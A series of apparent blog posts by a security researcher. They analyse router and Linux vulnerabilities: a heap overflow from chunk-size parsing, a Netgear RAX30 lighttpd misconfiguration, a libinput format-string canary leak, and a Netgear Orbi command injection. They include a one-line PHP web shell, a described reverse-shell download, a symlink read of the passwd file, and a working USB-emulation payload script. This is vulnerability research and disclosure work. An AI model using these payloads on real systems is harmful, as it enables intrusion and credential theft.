Initial Request Handling: Process_upnphttp()

The code responsible for the initial reception and processing of requests is in Process_upnphttp() and is described below.

Process_upnphttp(), upnphttp.c:1096

Data is read from the socket using recv(), up to 2048 bytes at a time, into a static 2048-byte char buffer. If data is received, the code calculates new_req_buflen as req_buflen + bytes_recv'd and checks whether the new buffer length would exceed a max value of 1MB. If so, an error is return; otherwise the code continues.

    struct upnphttp *h = ev->data;
    char buf[2048];
    [...]
    {
        int new_req_buflen;
        const char * endheaders;

        // new buf_len is the sum of the last calculated red_buflen and the
        // number of bytes the call to `recv` returned
        new_req_buflen = n + h->req_buflen + 1;

        // check to see if the new buf len exceeds a max value (1MB)
        if (new_req_buflen >= 1024 * 1024)
        {
            DPRINTF(E_ERROR, L_HTTP, "Receive headers too large (received %d bytes)\n", new_req_buflen);
            h->state = 100;
            break;
        }
    }

Further down in this function, realloc() is called using the calculated new_req_buflen as the size and passing the pointerh->req_buf as the buffer to perform the reallocation on. On the first round of processing (i.e. the first 2048 bytes received) h->req_buf will be NULL and realloc() behaves like a normal call to malloc(). The data is copied from the static buffer into the buffer pointed to by h->req_buf and the h->req_buflen field of the upnphttp struct is updated with the new size.

                h->req_buf = (char *)realloc(h->req_buf, new_req_buflen);
                if (!h->req_buf)
                {
                    DPRINTF(E_ERROR, L_HTTP, "Receive headers: %s\n", strerror(errno));
                    h->state = 100;
                    break;
                }

                // copy n bytes from the local `buf[2048]` to the alloc'ed memory
                // req_buflen will be 0 on the first round of processing since it's not updated
                // until the next line.
                memcpy(h->req_buf + h->req_buflen, buf, n);
                // update req_buflen
                h->req_buflen += n;

Next, the buffer is null terminated and then passed to strstr() to search for an \r\n\r\n sequence to determine whether the full HTTP headers section of the request has been received. Upon finding this sequence, the start of the request body and it’s size are also calculated and the respective values in the upnphttp struct (req_contentoff and req_contentlen) are updated. The code then calls ProcessHttpQuery_upnphttp() to move onto parsing.

            h->req_buf[h->req_buflen] = '\0';

            // search for the string "\r\n\r\n" and calculate content offset and content length if
            // found
            endheaders = strstr(h->req_buf, "\r\n\r\n");

            if(endheaders)
            {
                h->req_contentoff = endheaders - h->req_buf + 4;
                h->req_contentlen = h->req_buflen - h->req_contentoff;
                ProcessHttpQuery_upnphttp(h);

NOTE: The headers have only been read into h->req_buf at this point without parsing; they will be parsed into fields of the upnphttp struct within the call to ProcessHttpQuery_upnphttp() at the end of this code block.

ProcessHttpQuery_upnphttp():

The first call to this function only happens once the \r\n\r\n sequence is found, indicating the end of the HTTP header section was received. After parsing the HTTP verb and path, it calls ParseHttpHeaders() to perform the actual parsing of the header data before doing anything else; the source of the vulnerability is found here.

When ParseHttpHeaders() returns and indicates the full request was recieved by setting h->req_chunklen to 0, processing of the chunks in the HTTP body will resume in ProcessHttpQuery_upnphttp(); this is where the corruption caused by the bug is triggered when h->req_chunklen is passed to memmove() without validating that it does not exceed the allocated buffer.

BUG: Incorrect Chunk Size Validation in ParseHttpHeaders()

After reading data from the socket and finding the end of the HTTP header section as indicated by the presence of the \r\n\r\n sequence, Process_upnphttp() passes the request off to ParseHttpQuery_upnphttp(), which in turn calls ParseHttpHeaders() to perform the actual parsing of the header data into a upnphttp struct. If the HTTP headers contain the Transfer-Encoding:chunked header, a flag is set on the structure which will result in the application reaching the vulnerable code on line 428.

After some rudimentary sanity checks of the h->req_chunklen and h->req_contentoff fields of the struct, the code iterates through the rest of the request body, attempting to read the numeric size values for each of the chunks at the expected offsets based on sizes read. It combines the step of reading the size value and attempting to perform the size validation inside the conditions of the following while loop:

    while( (line < (h->req_buf + h->req_buflen)) &&
           (h->req_chunklen = strtol(line, &endptr, 16) > 0) &&
           (endptr != line) )

The following checks are performed:

Checks if the char ptr line has been incremented past the end of the allocation in h->req_buf. line is incremented by the parsed req_chunklen at the end of the inner block of the while loop.
Attempt to parse a size value using strtol() and ensure the value is greater than 0;
Ensure the char pointer endptr is not pointing to the same location as line after the call to strtol() which indicates no parsable digit was found.

The bug occurs in the evaluation of the second condition, where strtol() is called; the intent is for the return value of strtol() to be saved to h->req_chunklen and to compare the saved value to 0 for the validation step. Instead, the result of the comparison expression strtol(x,x) > 0 is saved to h->req_chunklen, resulting in the incorrect calculation of the total expected request size as the Boolean result of the expression would evaluate to 1 for all numbers greater than 0.

Within the inner block of the while loop, the value saved to h->req_chunklen is used to increment the line pointer to the location where the next chunk size is expected, indicating the true intent of the code (comments added for annotation).

    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            return;
        }

        // if strtol() returned a size greater than 0, `line` will only ever be incremented
        // by 1 (the bool eval of the comparison in int) at most, which means the first validation
        // condition in the while loop will not properly detect large values that exceed the size
        // of the request buffer allocation
        line = endptr+h->req_chunklen+2;
    }

This means that even for very large chunk sizes, the line pointer will only ever be incremented by 1 at most for each iteration through the loop, meaning the validation check in the first condition of the while loop will not be triggered and catch these sizes that exceed the length of data sent in the request body.

OOB read/write on chunk sizes > request length in ProcessHttpQuery_upnphttp()

After the headers have been parsed in ParseHttpHeaders(), execution returns to ProcessHttpQuery_upnphttp(), where the value saved to h->req_chunklen is checked; if it is 0 after the request header parsing, it is assumed that the full request has been received and that the request buffer at h->req_buf is large enough to fit all the expected data based on chunk sizes.

Parsing of the actual chunks from the request body then continues in the code block below (upnphttp.c:893) after returning from ParseHttpHeaders():

    char *chunkstart, *chunk, *endptr, *endbuf;
    // chunk, endbuf, and chunkstart all begin pointing to the start of the http request body
    chunk = endbuf = chunkstart = h->req_buf + h->req_contentoff;

    while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            Send400(h);
            return;
        }
        endptr += 2;

        // this call to memmove will use the chunklen parsed by strol() above
        // without checking that it doesn't read beyond the end of the request buf.
        memmove(endbuf, endptr, h->req_chunklen);

        endbuf += h->req_chunklen;
        chunk = endptr + h->req_chunklen;
    }
    h->req_contentlen = endbuf - chunkstart;
    h->req_buflen = endbuf - h->req_buf;
    h->state = 100;

Summary of while loop conditions/checks:

Condition 1:
- Attempt to parse a chunk size number as a long using strtol(), passing in the chunk pointer which begins the while loop pointing to the start of the request body section (immediately following the headers). The number will be parsed as base 16, meaning hex digits A-F are considered valid.
- The return value of the call to strtol() is saved to h->req_chunklen and a comparison is performed to check whether it is greater than 0; this must evaluate true for the parsing to continue
Condition 2:
- Check that the value that strtol() saved to endptr does not point to the same place as chunk, which would indicate that no valid numeric value could be parsed from the string.

The code in this block relies on the validation performed during the header parsing step and so it parses and uses the user-controlled chunk size as the size argument in calls to memmove() without bounds checking. This results in the application accepting chunk size values that exceed the number of bytes received in the request, leading to an OOB read/write.

The while loop used to iterate through the chunks in this block is nearly identical to the one in ParseHttpHeaders(), except this one includes an additional set of parentheses around the assignment and comparison expressions in the call to strtol(), resulting in the correct assignment of the return value to h->req_chunklen. Had the same bug present in the ParseHttpHeaders() chunk size parsing code been introduced here, it would have probably been noticed much sooner as chunks would likely get truncated as a result of the incorrect logic.

Conclusion

Suggested Fix

The issue can be fixed by wrapping the assignment expression in the second condition of the while loop in ParseHttpHeaders() (upnphttp.c:150) used to validate chunk sizes in parentheses to correctly separate the assignment from the comparison expression that compares the value to 0.

The fixed code would be:

    while ((line < (h->req_buf + h->req_buflen)) &&
           ((h->req_chunklen = strtol(line, &endptr, 16)) > 0) && // FIX HERE
           (endptr != line) )

A patch with this fix was provided to the package maintainer along with the vulnerability report.

Disclosure Timeline

2023-04-18: Submitted vulnerability report to Zero Day Initiative RE: vulnerable Netgear RAX30
2023-05-04: ZDI rejects the vulnerability report (not interested in the product)
2023-05-05: Request a CVE ID from Mitre
2023-05-05: Unable to find a private avenue to report to the package maintainer directly, so instead submit reports to Debian and Ubuntu security teams since they have vuln versions in their repos
2023-05-08: Debian security team shares the email address of the package maintainer; reach out to them over email and submit a private bug report on the Sourceforge page.
2023-05-08: Package maintainer acknowledges report and begins working on fix
2023-05-31: Package maintainer releases fixed version, 1.3.3
2023-05-31: Follow up message to Mitre, CVE assignment pending
2023-06-02: Mitre assigns the vulnerability CVE-2023-33476

Exploitation

As this is a heap-based vulnerability, exploitability of this issue will be dependent upon the Glibc version the application is linked against and compiler exploit mitigations, to some extent. Ultimately, because the bug provides for a strong read/write primitive, there are various options for exploitation.

Part 2 of this series going over the exploit development process and the exploits I wrote for this bug can be found here.

Reference/Links

RAX30 Patch Diff Analysis & Nday Exploit for ZDI-23-496

2023-05-12T00:00:00+00:00

Having recently spent some time working on an exploit for an 0day I’d found on the RAX30, the recent release of a few ZDI advisories for this device caught my attention. I took a quick look to confirm there weren’t any collisions with my bug, and after confirming this wasn’t the case (phew!), I decided to use this as an opportunity to do some patch diff analysis and see if there were any bugs worth writing exploits for.

Overview

Target bugs:

ZDI-23-499: soap_serverd buffer overflow
ZDI-23-496: lighttpd misconfiguration -> RCE

Target firmware versions:

Prepatch: 1.0.9
Patched: 1.0.10

Analysis

ZDI-23-499: soap_serverd stack-based buffer overflow

The description of this bug says the flaw occurs because “when parsing SOAP message headers, the process does not properly validate user supplied data before copying it to a fixed-length stack buffer.” Based on my previous experience with Netgear and specifically their SOAP server implementations, I had a pretty good idea where to look. In fact, I even a hunch that this was the same/similar to a bug I’d found on another Netgear device last year, and so before spending much time going through the diff’ed binaries, I did a quick search for references to sscanf in the patched and nonpatched versions and pretty easily identified where the bug occured. Interestingly, this bug is very similar but also unique to the issue I’d previously found – leave it to Netgear to ship two unique vulnerabilities using the same vulnerable C functions and in code that processes the same data lol.

The bug is caused by use of sscanf() without supplying length-limit values in the format string. The vulnerable version of the code attempts to parse out the HTTP method, path, and HTTP version string from the header using the following code:

    iVar1 = __isoc99_sscanf(local_3024,"%[^ ] %[^ ] %[^ ]",&v1, &v2, &v3);
    if (iVar1 == 3) {
      iVar7 = strcasecmp((char *)&v1, "post");

This is the patched version of the same code, showing the addition of length limit specs in the format string:

    iVar1 = __isoc99_sscanf(&local_1824,"%511[^ ] %511[^ ] %511[^ ]",&v1, &v2, &v3);
    if (iVar1 == 3) {
      iVar7 = strcasecmp((char *)&v1,"post");

On the surface this looks like a pretty straightforward stack-based buffer overflow, and there seem to be some variables within the function that may be interesting targets for overwrite. An interesting note is that the advisory does not indicate this bug results in code execution but instead specifically mentions that it can be used to bypass authentication. This may be due to the fact that the binary is built with stack canaries, which makes exploitation more difficult. This is the same reason why I’d been unable to exploit the variant of this bug I mentioned earlier.

NOTE: The folks who discovered and exploited this bug at Pwn2Own posted their write-up of this bug before I had finished this post so I’ve been able to confirm the above assumption was correct: the stack canaries resulted in the bug not being directly exploitable for code exec. Check out their write-up here to see how they chained this bug with a few others to get RCE.

ZDI-23-496: lighttpd Misconfiguration RCE

The information provided about this bug indicates it isn’t a memory corruption issue but a misconfiguration that results in arbitrary code execution. Specifically it says:

The specific flaw exists within the configuration of the lighttpd HTTP server. The issue results from allowing execution of files from untrusted sources. An attacker can leverage this vulnerability to execute code in the context of root.

Based on this description, I focused on comparing the lighttpd configuration files in etc/lighttpd between the two versions.

Comparing Config Changes

etc/lighttpd/conf.d/lighttpd4.conf

The patches version of this file includes the follow additions:

Addition of alias.url = ("/shares" => "/var/samba/share/" at the global level
Inside the HTTP["url"] = "^/shares" definition for “usb storage” in the IPv4 section
- server.follow-symlink = "disable"
- static-file.exclude-extensions = ()
- fastcgi.server = ()

etc/lighttpd/conf.d/usb_lighttpd.conf

Addition of alias.url = ("/shares" => "/var/samba/share/" at the global level

etc/lighttpd/conf.d/usb_allow.inc

Inside the HTTP["url"] = "^/shares" definition for “usb storage” in the IPv4 section
- server.follow-symlink = "disable"
- static-file.exclude-extensions = ()
- fastcgi.server = ()

etc/lighttpd/conf.d/usb_allow_auth.inc

Inside the HTTP["url"] = "^/shares" definition for “usb storage” in the IPv4 section
- server.follow-symlink = "disable"
- static-file.exclude-extensions = ()
- fastcgi.server = ()

Conclusions Based on Changes

The issue seems to be focused around the /shares path, which is mapped to the samba share directory where mounted USB drives can be accessed on the network like a NAS. The addition of server.follow-symlink = "disabled" suggests the issue may result in the ability to access files on the host filesystem using symlinks on the mounted drive.

Its possible that the addition of fastcgi.server = () was needed to avoid having the global settings for this handlers apply. The top level fastcgi.server assignment in conf.d/lighttpd4.conf shows the following:

fastcgi.server += (
	".php" => ((
		"socket" => "/var/run/php-fpm.sock",
		#"bin-path" => "/bin/php-fpm -n -R -y /etc/php-fpm.conf",
		#"max-procs" => 1,
		"broken-scriptfilename" => "enable"
	))
)

This lead me to believe the exclusion of the explicit fastcgi.server = () in the pre-patched version resulted in the global setting being applied, which would allow PHP files to be executed.

Exploits: ZDI-23-496 Lighttpd Misconfiguration

Based on the conclusions drawn from the changes made, the most likely entry point was going to be files mounted via USB drive so I created a ext2-formatted drive to use for testing (ext2 since it was going to be necessary to create symlinks) and downgraded to the vulnerable firmware version.

Local File Inclusion via Symlink

My assumption was that the addition of the symlink config options in the latest patches meant that the vulnerable version would follow symlinks resulting in the ability to reference (and access) files outside of the USB filesystem. To test this, I created a symlink on the USB drive pointing to /var/passwd as this is where the actual passwd file is stored on the device at runtime. If the assumption is correct, accessing this file from the router should return the actual password file from the device.

After connecting the USB drive to the router, the files become visible at http:///shares/. Accessing the symlink that was created pointing to /var/passwd results in the actual password file on the device (found at that path) being returned and downloaded locally.

RCE via PHP Files

To test the assumption regarding PHP files mounted via USB being executable, I used the same USB stick, this time simply creating a PHP file to execute phpinfo(); as a simple way to confirm execution. This worked as expected and the PHP info output was shown on the page. I then created a simple PHP page that would allow me to pass shell commands in a URL parameter for easy shell access.

PHP shell command proxy:

 echo system($_GET['cmd']); ?>

Finally, I used this to have the device download a shell script over HTTP from my machine to open a reverse shell:

Conclusion

This turned out to be a fun exercise and it turned out some of my prior experience with Netgear devices proved to be useful.

The soap_serverd issue was exploited during the latest Pwn2Own as part of a longer exploit chain that eventually resulted in RCE, though direct exploitation seems infeasible due to the presence of stack canaries.

For the lighttpd issue, exploitation requires physical access to the device, at least long enough to plug in the USB drive and send the necessary requests. This isn’t infeasible, though considering these routers are primarily used in SOHO settings this may not be quite as critical as a fully remote RCE.

References/Links

nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)

2022-08-04T00:00:00+00:00

At the end of last year I stumbled on a crash in Xorg while playing with the GreatFET One but never really got around to follow up on it. Then a few weeks ago, I decided to finally root cause the issue and while in the middle of doing so I discovered that the issue had been reported and fixed only 3 months ago. Since I’d already started working on it though, I decided to just move onto writing some exploits. In this post I walk through the details of writing an exploit to leak the stack canary.

Discovery

This is an issue that I had independently discovered in Xorg (or so I thought) a while back while messing around with the GreatFET One, a cool little device for USB hacking. While trying out some random payloads I found that connecting a USB keyboard device with format strings in certain device descriptor fields caused Xorg to crash. Specifically, it was the manufacturer, serial, product string fields. Unfortunately, I quickly ran into issues while trying to setup a testing environment as I would immediately crash my own X session as soon as I connected the device, even when trying to pass it through to a VM directly. I decided to just save it for another day when I had time to figure out a good solution to those issues, but it ended up sitting for months and I never did much to go back to it.

Then, a couple of weeks ago I saw some CVEs get released for something in Xorg that seemed tangentially related to input devices, which piqued my attention. It got me wondering whether it was the same bug I had found, so I dug up my notes and decided to take a closer look. While doing this I figured out that the issue was actually not in Xorg itself (at least not completely), but actually in libinput. Once I’d figured this out, I went looking for the libinput source code to find the code for the functions I was seeing in the backtrace and ended up finding the specific commit where the issue was fixed in April of this year. Well, shit lmao.

Root Cause Analysis

The reporter of the issue provided a detailed description of the vulnerability in the report. Here’s a snippet that’s a good tl;dr:

- Newly connected evdev devices are logged using evdev_log_msg.
- The format parameter is manipulated at src/evdev.h:785 to prepend (among other things) the device name.
- The resulting string buf is then passed as the format parameter to log_msg_va at src/evdev.h:796
- In X.org (and probably other users of libinput), this logging function eventually leads into the system's sprintf.
- If the device name contains printf-style formatting placeholders such as %s or %d, these will be passed on to the new format string, and interpreted incorrectly. User-controlled format strings are a known security vulnerability, CWE-134, and can be used by an attacker to execute malicious code.

Basically, the issue came down to the fact that user-controlled input was prepended to a predefined format string before being used as the format argument in a call to sprintf().

While doing some more digging on specific components of libinput I came across the blog post where the reporter(s) talked about the accidentally stumbling across the issue and their root causing process (no surprise, its actually a security company lol). Check out that post for a great analysis and description of exactly where the issue happens.

So, the root cause analysis was already done…but no poc exploit code was provided. There was an intersting discussion around the likelihood/plausability of exploitation in the git issue between the reporter(s) and developers where they discussed potential avenues for exploitation and the true impact/risk (check it out for details). tl;dr the determination was that at best the bug provides an attacker with an info leak and nothing else but at worst could potentially lead to code execution.

With that in mind, I thought it still might be worth doing the work of exploring both the info leak and the potential for RCE and produce exploits for both (hopefully).

Exploit: Leaking the Stack Canary

I started off with the info leak exploit. One of the most useful things an info leak can provide is the ability to leak the stack canary so I decided that would be the goal of the exploit. Because the canary value is stored on the stack and format string arguments are read from the stack, its usually possible to do this pretty easily.

Testing environment:

Debian 11 host
Xubuntu 20.04 VM in Virtualbox
USB host device passthrough to the VM
Set up SSH on VM

First things first, though: in order for a format string to be useful for this kind of info leak, there needs to be a way to get output back from the program that shows the values read from the stack. Thankfully, in this case,the output is written to the Xorg log file, which is world-readable. With the confirmed, the next step was figuring out exactly where the stack canary was so we can find it reliably.

Constraints: Field Length Limit

In this case, there were some constraints that made things only slightly harder. The length of each field must be less than 126 characters - this is because the USB device structure that holds the fields is 255 bytes, the first 4 of which are reserved to hold the length of the field. The string values are interpreted as UTF-16 as per the USB specification, so the remaining 254 bytes are split in half.

Constraint: Additional %s format strings

The first issue I ran into almost right away when I started testing payloads was that nearly every payload I tried immediately resulted in a SIGSEGV. It wasn’t immediately obvious why this was happening as it’s usually possible to use specifiers like %x to read values without causing a crash (i.e. doesn’t usually lead to OOB read).

Specifically, one of the calls to *sprintf_internal was prepending the format strings I was submitting to another string that contained another 11 %s specifiers, as show in the GDB output below

Thread 1 "Xorg" hit Breakpoint 1, __vsnprintf_internal (string=0x7ffce6903d65 "", maxlen=0x3fb, format=0x7ffce69041c0 "event7  - CCCC : is tagged by udev as:%s%s%s%s%s%s%s%s%s%s%s\n", args=0x7ffce69041a8, mode_flags=0x2) at vsnprintf.c:95

This is a problem because each format specifier placed in the controllable strings will consume an argument from the stack and %s format specifiers indicate the argument value will be treated as a char pointer and dereferenced as such; once the arguments for each format spec in the submitted payload were consumed, it became virtually impossible to avoid triggering a segmentation fault caused by a read to an invalid address when the %s specs were reached.

After doing a bit of reading through the man pages for sprintf and some Google searches, I figured out I could use direct parameter access on the format specs in my payload to keep the va_arg pointer fixed. Using parameter access in the format specs does not move the main argument pointer, so in a format string such as %1$x %2$x %x , the first format reads from parameter 1 and the second from parameter 2, but the third reads from parameter 1 again because it’s the first format spec to appear without a parameter specified. The example below shows this in action:

xorg@xuxorg:~$ echo -n "%1\$s%2\$s%3\$s%4\$s" | ./toy
[+] fmt string: '%1$s%2$s%3$s%4$s | %s%s%s%s\n'
[+] args: '1111.', '4444.', '5555.', '6666.'

[+] result:
1111.4444.5555.6666. | 1111.4444.5555.6666.

This is how I was able to get around the issues with the extra %s specs, but it cut down the total number of format specificiers I could place in a single field. There were a total of 126 characters that could be used and each normal format spec (without a parameter index) takes up 2 characters, resulting in a total of 63 format specs that could be inserted. The addition of the parameter access syntax adds a minimum of 2 characters per format spec. Assuming only single-digit indices are used (4 characters total), this cuts down the actual max number of specs that could be included in each field to 31. This means for each run of the ‘exploit’ we’ll only be able to read a total of 31 values off of the stack.

Those already familiar with format string bugs would be correct to assume that, ultimately, this length limit isn’t necessarily an issues since it doesn’t limit how far into the stack we’re able to read. This is because the set of parameter indices can be updated between runs (e.g. run1 uses indices 1-20, run2 uses indices 20-40, etc) to continue reading further into memory. Unfortunately, this is one of the cases where the length limit is very much an issue, as I quickly discovered when I tried to do that.

Constraints: FORTIFY_SOURCE=2

While doing some testing and trying to dump out values I noticed that any time I used parameter access format specs that didn’t include all indices below the max index used (i.e. if a format string accessed parameter 5 without accessing 1-4) the application would crash with a SIG_ABORT. When investigating this with GDB attached, I noticed this string in the exception handler that throws the ABORT signal: "*** invalid %N$ use detected ***\n". A quick Google search later led me to figuring out that the Xorg binary I was testing against was compiled with the FORTIFY_SOURCE=2 flag.

a quick detour: tl;dr on FORTIFY_SOURCE=2

I wasn’t familiar with the specific mitigations/checks provided by this flag before this so I spent a bit of time digging into it. I’ll probably spend more time talking about this in a future post so for now here’s the tl;dr version with the most important points:

Compiler-provided security checks and exploit mitigation mechanisms (just like -fstack-protector)
This includes both compile-time and run-time checks
=2 specifically enables format string exploit mitigations; requires optimization level ≥ 2
- %n is not allowed in format strings stored in writeable memory (i.e. don’t allow from user-writeable memory regions)
- Direct parameter access cannot ‘skip’ values; if the 5th parameter is accessed directly, parameters 1-4 must also be accessed somewhere in the format string

That last point is the pertinent one in regard to the issue mentioned at the end of the previous section. This meant that the length limit would effectively create a maximum parameter index that could be accessed while remaining within the boundaries of the constraints and avoiding a crash.

We can calculate the max index like so:

Accessing single-digit indices consume 4 characters per spec: %N$x
- Accessing arguments 1-9 consumes 36 characters total (9 * 4)
Accessing double digit indices (10 to 99) consume 5 characters per spec: %NN$x
- With 90 characters remaining (126 - 36), a maximum of 18 more arguments can be accessed (90 / 5)
Maximum index is 9 + 18 = 27

Exploit: Leaking the Canary

Given the constraints described above, the exploit ultimately comes down to a bit of luck — as long as the canary is close enough on the stack to be reachable with the available parameter indices for the vulnerable stack frame, it should be leaked in the log file.

I began with this payload, which only reads up to the 22nd arg so that the .’s between the specs can be included to split things up and make the outputs easy to distinguish.

"%1$p.%2$p.%3$p.%4$p.%5$p.%6$p.%7$p.%8$p.%9$p.%10$p.%11$p.%12$p.%13$p.%14$p.%15$p.%16$p.%17$p.%18$p.%19$p.%20$p.%21$p.%22$p"

Unfortunately, that didn’t work and none of the values in the output matched the pattern of a canary. So, it would come down to the last 5 args. I removed the dots from the first 22 formats to get those characters back and read up the 25th.

"%1$p%2$p%3$p%4$p%5$p%6$p%7$p%8$p%9$p%10$p%11$p%12$p%13$p%14$p%15$p%16$p%17$p%18$p%19$p%20$p%21$p%22$p.%23$p.%24$p.%25$p"

Luck was on my side. I checked the logs and found what looked a lot like a canary value. As can be seen, the value’s location on the stack changes slightly between different vulnerable function calls. Stack canaries on most Linux distros are 64-bit numbers that end with a null byte. They’re usually not too difficult to find since they don’t look like valid addresses or hex ASCII values(except when they do).

Facedancer Script

Facedancer is the name of another USB hacking board similar to the GreatFET and a Python module that provides USB emulation capabilities for compatible boards. This is incredibly useful for quick prototyping and testing, especially being able to programmatically define how the device will behave in response to different requests sent by the host.

This Facedancer script will trigger the bug and place markers around the locations that are likely to contain the canary value to make it easier to find.

#!/usr/bin/env python3
# pylint: disable=unused-wildcard-import, wildcard-import
import sys
import os
import logging
from facedancer             import devices, main
from facedancer.devices.keyboard import USBKeyboardDevice

prefix = "%1$c%2$c%3$c%4$c%5$c%6$c%7$c%8$c%9$c%10$c%11$c%12$c%13$c%14$c%15$c%16$c%17$c%18$c%19$c%20$c%21$c%22$c"
canary_maybes = "X:%23$p_X:%24$p_X:%25$p" # grep for `X:0x.{14}00`
payload = prefix + canary_maybes

print("[+] reading args from $FSERIAL, $FPRODUCT, and $FMANU env vars")
serial = os.environ.get("FSERIAL", "C"*100)
product = os.environ.get("FPRODUCT", "HYPRODUCT")
manu = os.environ.get("FMANU", payload)

# create the device and connect
DEVICE = USBKeyboardDevice()
DEVICE.serial_number_string = serial
DEVICE.manufacturer_string = manu
DEVICE.product_string = product
DEVICE.product_id = 0x1337
DEVICE.vendor_id = 0x1337
main(DEVICE)

The values can then be searched for in the Xorg log file using grep:

# find it in the logs
grep -a -E "X:0x.{14}00" /var/log/Xorg.0.log

The screenshot below the canary value in the running Xorg process while attached with GDB and the same value shown in the Xorg log:

This has only been confirmed to work on default installations of Xubuntu 20.04.4 (i.e. before installing any updates, as patches have been pushed). I did test on a Debian 11 system but wasn’t able to get the canary value to leak within the same constraints. Apparently, most distros now enable essentially all exploit mitigations (canaries, RELRO, FORTIFY_SOURCE, etc) on default packages. So, YMMV on different distros or even Ubuntu versions.

Code Exec?

I spent quite a bit of time trying to see whether I could turn this into a code execution bug, but as mentioned above, the FORTIFY_SOURCE=2 checks prevent the use of %n , which really complicates things. The only bypass technique I’ve been able to find is from a 2010 Phrack article, “A Eulogy for Format Strings”, which involves abusing the use of alloca in glibc’s internal vfprintf implementation to shift the stack and cause a 4-byte NULL write at a controllable location. This NULL write is used to overwrite the flag on the open file stream object for stdout which is used to determine whether to enforce the FORTIFY checks. I’m not sure whether that same behavior can be abused in modern glibc versions on 64-bit systems (pretty much everything I’ve found online is on 32-bit systems, and at least 6-7 years old) but I’m still playing around with it. I’ve been able to get some interesting behavior but nothing so far that’s gotten me closer to code exec in any significant way. In any case, I think it may be an area worth exploring, if at least to confirm whether some bypass can be achieved on modern systems. If not, I may end up just building a vulnerable version without the fortify checks and write an exploit for that.

So, for now, no code exec :(.

Reference/Resources

libinput Gitlab Issue #752
Accidental Intrusion, CVE-2022-1215 (blog post by the researcher(s) that reported the bug)
A Eulogy for Format Strings (Phrack 0x43)
Facedancer
Stack Canaries

nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)

2022-07-02T00:00:00+00:00

An unauthenticated command injection vulnerability in Netgear Orbi devices was reported to Netgear in December 2020 by ZDI. I wanted to learn more about the bug, but the details of the vulnerability were never released and there were no known exploits. Having spent the last year and a half looking at this system, I decided to try to find the bug myself and see if I could write a functional exploit. It was tougher than I expected, but I made it work in the end :)

introduction

As I’ve mentioned in previous posts, I’ve been hunting for bugs on the Netgear Orbi for about a year and half. A few weeks ago, I came across an advisory for an unauthenticated command injection vulnerability that was reported to Netgear back in December 2020 and realized that the vulnerable firmware version was the same one that was installed on my device back when I first started looking for bugs on it. In fact, the issue had only been fixed about a month before then. If only I’d started looking just a little bit sooner! Since it was way too late for that, I thought it’d be fun to see if I could find where the vulnerability was located and write a functional exploit to gain full control of the device.

initial analysis

There were no known exploits for this vulnerability at the time I started looking and the only useful information came from the CVE entry on Mitre:

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR Orbi 2.5.1.16 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UA_Parser utility. A crafted Host Name option in a DHCP request can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11076.

Even though it’s not much, this provided enough information to narrow things down to a specific binary and a specific input path. It would mostly come down to finding the bug and working up from there to trace the input back to the source.

finding the vulnerability

With the info taken from the advisory, I moved on to analyzing the vulnerable version of UA_Parser to try to find where the vulnerability occurred. Since I knew this was command injection, the most likely suspect was insecure use of system() to execute commands. I loaded the binary up in Ghidra and used the symbol table to select system() and then used the Function Call Tree to check the functions that had incoming references to it. While doing this, I came across the following code snippet in one of these functions (annotated for clarity):

This code stood out as a good candidate for command injection given that the argument passed to system() is a string constructed with what looked like user-controlled data. Additionally, the values are placed inside double quotes, which would allow for expansion.

I then took a look at the function I labeled get_host_from_file() at line 78 in the image above and learned that this function eventually reads from a file at /tmp/netscan/attach_device , which contains entries for each client connected to the router, including MAC, IP, and hostname. It parses out the hostname it finds and fills the static buffer hostname which is passed as an argument to get_host_from_file(). This value is eventually passed as the 4th format string arg to snprintf() on line 84, which constructs the string that is passed to system().

At this point I felt pretty confident this was where the vulnerability occurred, but to get additional confirmation I took a look at the version of UA_Parser included with a firmware that was released after this bug was fixed (v2.7.3.22) to compare. The only thing that changed between the two snippets is the double-quotes that surround the user-controlled values were replaced with single-quotes (also known as ‘strong-quotes’), where no expansion/meta-character interpretation occurs:

tracing the data from sink → source

The next thing I needed to figure out was how the hostname value eventually reached this code. As mentioned above, UA_Parser reads the hostname value from the file /tmp/netscan/attach_device. I didn’t find any other references to this file in UA_Parser that indicated it writing to the file, so I used grep to recursively search the root filesystem I had extracted from the firmware image to find other files that referenced it. This is when I came across the binary /usr/sbin/net-scan which seemed like a good lead given the name.

After spending some time going through the code in Ghidra, I eventually found the function used to write /tmp/netscan/attach_device which I labeled update_attach_devices(). There was only a single reference to this function, which occured within another function that appeared to be the main entrypoint to trigger a ‘device scan’; this function is also only referenced once (from main()):

Naturally, my next question was about where/how net-scan was getting the values it used to populate the attached devices file. I spent some more time looking through the decompiled code and eventually came across a function that opened a file at /tmp/dhcpd_hostlist for reading. This caught my attention because the advisory for the vulnerability mentioned that a “crafted Host Name option in a DHCP request can trigger execution of a system call”, so it made sense that net-scan would get it’s values from whatever the DHCP server had received.

Another recursive grep later, I had confirmed that the DHCP server binary (/sbin/udhcpd and /sbin/udhcpd-ext) contained references to /tmp/dhcpd_hostlist. Since the source code for udhcp is included in the GPL sources for the device provided by the vendor, I took a look there and found the string in leases.h as a constant called HOSTNAME_SHOWFILE. This value is used in some custom code in a function called show_clients_hostname() in dhcpd.c (shown below at line 111) which writes the MAC/IP and hostname for each lease in the global leases structure to this file.

Below is a snippet of code from sendACK() in serverpacket.c:, one of two locations where show_clients_hostname() is called. One detail that became really important later is the call to toupper() on line 535 — it’s called for each character in the hostname string before it is saved to the lease object where it’s saved. This causes all alphabetic letters to be uppercased in the value that’s written out to /tmp/dhcpd_hostlist and eventually ends up in the vulnerable call to system().

summary of the analysis

the vulnerability occurs in UA_Parser due to a call to system() using a string containing a attacker-controlled hostname value
UA_Parser reads the hostname value from /etc/netscan/attach_device
UA_Parser is executed by a binary called net-scan used to detect attached devices
net-scan creates the file /etc/netscan/attach_device
net-scan reads the hostname values from the file /tmp/dhcpd_hostlist
/tmp/dhcpd_hostlist is created by udhcpd using the hostnames saved in it’s global leases array
udhcpd populates the hostname field for each lease struct in the global array using values received in DHCP REQUEST packets

testing setup

debugging

